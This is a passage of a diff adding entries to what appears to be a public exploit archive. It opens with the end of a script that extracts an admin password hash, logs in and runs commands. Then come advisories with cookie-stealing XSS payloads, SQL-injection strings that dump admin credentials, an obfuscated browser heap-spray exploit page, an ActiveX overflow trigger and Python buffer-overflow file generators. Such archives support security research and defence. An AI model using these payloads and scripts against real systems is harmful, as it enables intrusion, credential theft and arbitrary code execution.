length = getusernamelength()
print " [+] Grabbing username characters"
tmpuser = username(length)
adminusr = "".join(tmpuser)
print " [+] Grabbing password hash"
tmppass = password(32)
admpass = "".join(tmppass)
print " [+] Admin username: "+ adminusr
print " [+] Admin password hash: " + admpass
plain = sendhashaway(admpass)
login(domain,adminusr,plain)
while(quit != 1):
cmd = raw_input(' [+] Run a command: ')
if cmd == 'quit':
print " [-] Hope you had fun :)"
quit = 1
if cmd != 'quit':
print " [+] "+ commandexec(domain,cmd)

9
platforms/php/webapps/34453.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/42423/info
PaoBacheca is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
PaoBacheca 2.1 is vulnerable; other versions may also be affected.
http://www.example.com/paobacheca/demo/index.php/"><script>alert(document.cookie);</script>

9
platforms/php/webapps/34454.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/42423/info
PaoBacheca is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
PaoBacheca 2.1 is vulnerable; other versions may also be affected.
http://www.example.com/paobacheca/demo/scrivi.php/"><script>alert(document.cookie);</script>

8
platforms/php/webapps/34455.txt Executable file
View file

@ -0,0 +1,8 @@
source: http://www.securityfocus.com/bid/42424/info
Rock Band CMS is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/news.php?year=-2004+UNION+SELECT+1,2,3,4--
http://www.example.com/news.php?id=-1+UNION+SELECT+1,2,3,4--

132
platforms/php/webapps/34456.txt Executable file
View file

@ -0,0 +1,132 @@
source: http://www.securityfocus.com/bid/42425/info
JBoard is prone to multiple SQL-injection and cross-site scripting vulnerabilities because it fails to sanitize user-supplied input.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, control how the site is rendered to the user, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
JBoard 0.2 is vulnerable; prior versions may also be affected.
================================================
JBoard <= 2.0 Commercial Version Sql/Xss Exploit
================================================
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /&#039; \ __ /&#039;__`\ /\ \__ /&#039;__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /&#039; _ `\ \/\ \/_/_\_<_ /&#039;___\ \ \/\ \ \ \ \/\`&#039;__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 0
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-1
#[+] Discovered By : Inj3ct0r
#[+] Site : Inj3ct0r.com
#[+] Support e-mail : submit[at]inj3ct0r.com
#[+] Visit : inj3ct0r.com , inj3ct0r.org , inj3ct0r.net
Site product: http://allpublication.ru/
Demo: http://allpublication.ru/board/demo/
admin; admin
Version: 2.0
-----------------------------------------------------------------
Xss Exploit:
editform.php?notice=<script>alert(&#039;www.example.com&#039;)</script>
*?user_title=</title><script>alert(&#039;www.example.org&#039;)</script>
*any pages because vulnerability in inc/head.inc.php
core/edit_user_message.php?edit_user_message="><script>alert(www.example.net)</script><noscript>
------------------------------------------------------------------
SQL-Inj3ct0r Exploit:
1) sboard.php
elseif (!@$_GET[&#039;id_mess&#039;] && !@$_GET[&#039;id_cat&#039;] && (@$_GET[&#039;op&#039;] == "all_cat" || @$_GET[&#039;city&#039;])) require_once("core/all_cat.php");
2) all_cat.php
if ($c[&#039;print_top&#039;] == "yes") require_once("inc/top_add.inc.php");
3) top_add.inc.php
There is a request to the database with the parameter $_GET[&#039;city&#039;], which is never filtered
if (@$_GET[&#039;city&#039;])
{
$from_city_query = mysql_query ("SELECT city_name FROM jb_city WHERE city_translit = &#039;".$_GET[&#039;city&#039;]."&#039; LIMIT 1");
if (mysql_num_rows ($from_city_query) == 1)
{
$from_city = mysql_fetch_assoc ($from_city_query);
$city_from_search = " AND city = &#039;".$from_city[&#039;city_name&#039;]."&#039; ";
The result is used in the second query:
$top_add = mysql_query ("SELECT A.id as board_id, A.*, B.* FROM jb_board as A, jb_board_cat as B WHERE A.id_category = B.id AND old_mess = &#039;old&#039; ".@$city_from_search." ORDER by hits DESC LIMIT $limit");
if (mysql_num_rows($top_add))
{
?>
<H4><?=$lang[610]?></H4>
<table border="0" class="GRayBox" cellpadding="0" cellspacing="0">
<tr class="top">
<td class="img1">&nbsp;</td>
<td class="img2">&nbsp;</td>
<td class="img3">&nbsp;</td>
</tr>
<tr>
<td class="imgL">&nbsp;</td>
<td class="t"><a href="#">
<?
while ($top = mysql_fetch_assoc ($top_add))
{
$tip = str_replace("\r\n"," ", htmlspecialchars($top[&#039;text&#039;]));
echo "<a href=\"".$h."/advertisement/nesting/".$top[&#039;id_category&#039;]."/kind/".$top[&#039;board_id&#039;]."/\" onmouseover=\"Tip(&#039;".$tip."&#039;)\"><strong>".$top[&#039;title&#039;]."</strong></a>";
Request number 1:
a &#039;UNION SELECT 1 --
Request number 2:
a &#039;UNION SELECT 1,2,3,4,5,6, concat_ws (0x3,login,password), 8,9,10,1 1,12,13,14,15,16,17,18,19, 20,21,22,23,24,25,26,27, 28,29,30,31,32,33,34 FROM jb_admin --
Transferred to the number (* 16):
0x612720554e494f4e2053454c45435420312c322c332c342c352c362c636f6e6361745f7773283078332c6c6f67696e2c70617373776f7264292c382c392c31302c31312c31322c31332c31342c31352c31362c31372c31382c31392c32302c32312c32322c32332c32342c32352c32362c32372c32382c32392c33302c33312c33322c33332c33342046524f4d206a625f61646d696e202d2d20
As a result, we obtain the following query:
sboard.php?city=a&#039;+union+select+0x612720554e494f4e2053454c45435420312c322c332c342c352c362c636f6e6361 745f7773283078332c6c6f67696e2c70617373776f7264292c 382c392c31302c31312c31322c31332c31342c31352c31362c 31372c31382c31392c32302c32312c32322c32332c32342c32 352c32362c32372c32382c32392c33302c33312c33322c3333 2c33342046524f4d206a625f61646d696e202d2d20% 20 -% 20
-------------------------------------------------------------------
SQL-Inj3ct0r Exploit:
POST request to /core/select.php
aaaaaaa &#039;UNION SELECT 1,2, concat_ws (0x3, login, password), 4,5,6 FROM jb_admin --
Output will be the last element of the drop-down
A vulnerable piece of code: paste the whole file)
---------------------------------
ThE End =] Visit my proj3ct :
http://inj3ct0r.com
http://inj3ct0r.org
http://inj3ct0r.net
# ~ - [ [ : Inj3ct0r : ] ]

9
platforms/php/webapps/34459.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/42430/info
Amiro.CMS is prone to multiple input-validation vulnerabilities including multiple cross-site scripting issues, an HTML-injection issue, and an information-disclosure issue.
An attacker may leverage the issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials, control how the site is rendered to the user and disclose sensitive information which may aid in launching further attacks.
Amiro.CMS 5.4.0 is affected; other versions may be vulnerable as well.
'status_msg' = a: 2: (s: 3: "sys"; a: 0: () s: 5: "plain"; a: 1: (i: 0; a: 2: (s: 3: "msg "; s: 68:" ONsec.ru - XSS test [ALERT] \ "); alert (document.cookie) / / alert ([/ ALERT]"; s: 4: "type"; s: 4: "none ";}}}

9
platforms/php/webapps/34464.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/42436/info
SyntaxCMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
SyntaxCMS 1.3 is vulnerable; prior versions may also be affected.
http://www.example.com/content/general/browse/?x=37&y=15&rows_per_page=10+ANY_SQL+--+&page=2

21
platforms/windows/dos/34442.html Executable file
View file

@ -0,0 +1,21 @@
source: http://www.securityfocus.com/bid/42418/info
Kylinsoft InstantGet ActiveX control is prone to a buffer-overflow vulnerability because it fails to properly bounds-check user-supplied data before copying it into an insufficiently sized memory buffer.
An attacker can exploit this issue to execute arbitrary code within the context of the application, typically Internet Explorer, that uses the ActiveX control. Failed exploit attempts will result in denial-of-service conditions.
Kylinsoft InstantGet 2.08 is vulnerable; other versions may also be affected.
<object classid=&#039;clsid:98C92840-EB1C-40BD-B6A5-395EC9CD6510&#039; id=&#039;target&#039; />
<input language=VBScript onclick=tryMe() type=button value="Click here to start the test">
<script language=&#039;vbscript&#039;>
arg1=-2147483647
target.ShowBar arg1
</script>
</span></span>
</code></pre>

82
platforms/windows/dos/34458.html Executable file
View file

@ -0,0 +1,82 @@
<!doctype html>
<html>
<head>
<meta http-equiv="Cache-Control" content="no-cache"/>
<sc?ript >
func?tion stc()
{
var Then = new Date();
Then.setTime(Then.getTime() + 1000 * 3600 * 24 * 7 );
document.cookie = "Cookie1=d93kaj3Nja3; expires="+ Then.toGMTString();
}
func?tion cid()
{
var swf = 0;
try {
swf = new ActiveXObject('ShockwaveFlash.ShockwaveFlash'); } catch (e) {
}
if (!swf)
return 0;
var cookieString = new String(document.cookie);
if(cookieString.indexOf("d93kaj3Nja3") == -1)
{stc(); return 1;}else{ return 0;}
}
String.prototype.repeat=func?tion (i){return new Array(isNaN(i)?1:++i).join(this);}
var tpx=un?escape ("%u1414%u1414").repeat(0x60/4-1);
var ll=new Array();
for (i=0;i<3333;i++)ll.push(document.create?Element("img"));
for(i=0;i<3333;i++) ll[i].className=tpx;
for(i=0;i<3333;i++) ll[i].className="";
CollectGarbage();
func?tion b2()
{
try{xdd.re?placeNode(document.createTextNode(" "));}catch(exception){}
try{xdd.outerText='';}catch(exception){}
CollectGarbage();
for(i=0;i<3333;i++) ll[i].className=tpx;
}
func?tion a1(){
if (!cid())
return;
document.body.contentEditable="true";
try{xdd.applyElement(document.create?Element("frameset"));}catch(exception){}
try{document.selection.createRange().select();}catch(exception){}
}
</ sc?ript >
</head>
<body onload='setTimeout("a1();",2000);' onresize=b2()>
<marquee id=xdd > </marquee>
<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" width="1%" height="1%" id="FE">
<param name="movie" value="storm.swf" />
<param name="quality" value="high" />
<param name="bgcolor" value="#ffffff" />
<param name="allowScriptAccess" value="sameDomain" />
<param name="allowFullScreen" value="true" />
</object>
</body>
<body>
<form name=loading>
 <p align=center> <font color="#0066ff" size="2"> Loading....,Please Wait</font> <font color="#0066ff" size="2" face="verdana"> ...</font>
  <input type=text name=chart size=46 style="font-family:verdana; font-weight:bolder; color:#0066ff; background-color:#fef4d9; padding:0px; border-style:none;">
  
  <input type=text name=percent size=47 style="color:#0066ff; text-align:center; border-width:medium; border-style:none;">
  <sc?ript >  
var bar=0 
var line="||" 
var amount="||" 
count() 
func?tion count(){ 
bar=bar+2 
amount =amount + line 
document.loading.chart.value=amount 
document.loading.percent.value=bar+"%" 
if (bar<99) 
{setTimeout("count()",500);} 
else 
{window.location = "http://www.google.com.hk";} 
}</ sc?ript >
 </p>
</form>
<p align="center"> Wart,<a style="text-decoration: none" href="http://www.google.com.hk"> <font color="#FF0000"> kick me</font> </a> .</p>
</body>
</html>

30
platforms/windows/dos/34460.py Executable file
View file

@ -0,0 +1,30 @@
source: http://www.securityfocus.com/bid/42434/info
Sonique is prone to a remote stack-based buffer-overflow vulnerability because the application fails to perform adequate boundary checks on user-supplied input.
Attackers may leverage this issue to execute arbitrary code in the context of the application. Failed attacks will cause denial-of-service conditions.
Sonique 2.0 Beta Build 103 is vulnerable; other versions may also be affected.
#Date: 12/8/2010
#Author:Hamza_hack_dz & Black-liondz1
#Software Link:Download: http://www.softpedia.com/progDownload/Sonique-2-Download-6707.html # #
#Version:sonique2
# web:www.sa-hacker.com/vb
# Email:hamza_hack_dz@hotmail.com &b-l@ho9mail.com
#!/user/bin/python
filename = "sa-hacker.xpl"
junk = "\x41" * 500000
exploit = junk
textfile = open(filename,'w')
textfile.write(exploit)
textfile.close()
# Inj3ct0r.com [2010-08-12]

46
platforms/windows/local/34463.py Executable file
View file

@ -0,0 +1,46 @@
#----------------------------------------------------------------------------------------------------#
# Exploit Title: HTML Help Workshop - (SEH) Buffer Overflow #
# Date: August 24 2014 #
# Exploit Author: Moroccan Kingdom (MKD) #
# Software Link: http://msdn.microsoft.com/en-us/library/windows/desktop/ms669985%28v=vs.85%29.aspx # #
# Version: 1.4 #
# Tested on: Windows XP SP3/SP2 | Windows 7 64/32-bit (eng) #
#----------------------------------------------------------------------------------------------------#
import subprocess,time
import sys,os
if os.name == "nt" :
subprocess.call('cls', shell=True)
os.system("color c")
else :
subprocess.call('clear', shell=True)
time.sleep(1)
print '''
///////////////////////////////////////////////////////////////////////////////
/ M.O.R.O.C.C.A.N /
/ K.I.N.G.D.O.M /
/ [MKD] /
/ CONTACT US : facebook.com/moroccankingdom024 | twitter.com/moroccankingdom /
/ To run this exploit Go to DOS and then go to the folder path program and /
/ run this command : hc | exm : hcc.exe AAAABBBCCCSSS... /
/////////////////////////////////////////////////////////////////////////////// '''
JNK = "A" * 284
NEH = "B" * 4
SEH = "C" * 4
SHL = "S" * 400
POC = JNK + NEH + SEH + SHL
try :
file = open("poc.txt", "w")
file.write(POC)
file.close()
print "\n[*] file created successfully"
except:
print "[#] error to create file"
close = raw_input("\n[!] press any button to close()")

9
platforms/windows/remote/34437.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/42377/info
The Portable Document Format (PDF) specification is prone to a signature-collision attack when signing PDF documents.
An attacker can exploit this issue to create PDF documents containing forged signatures. Successfully exploiting this issue will result in the application accepting the signature of a document as valid when it is not. This may result in a false sense of security; other attacks are also possible.
All products conforming to the specification for signing PDF documents are affected by this issue.
http://www.exploit-db.com/sploits/34437.tar.gz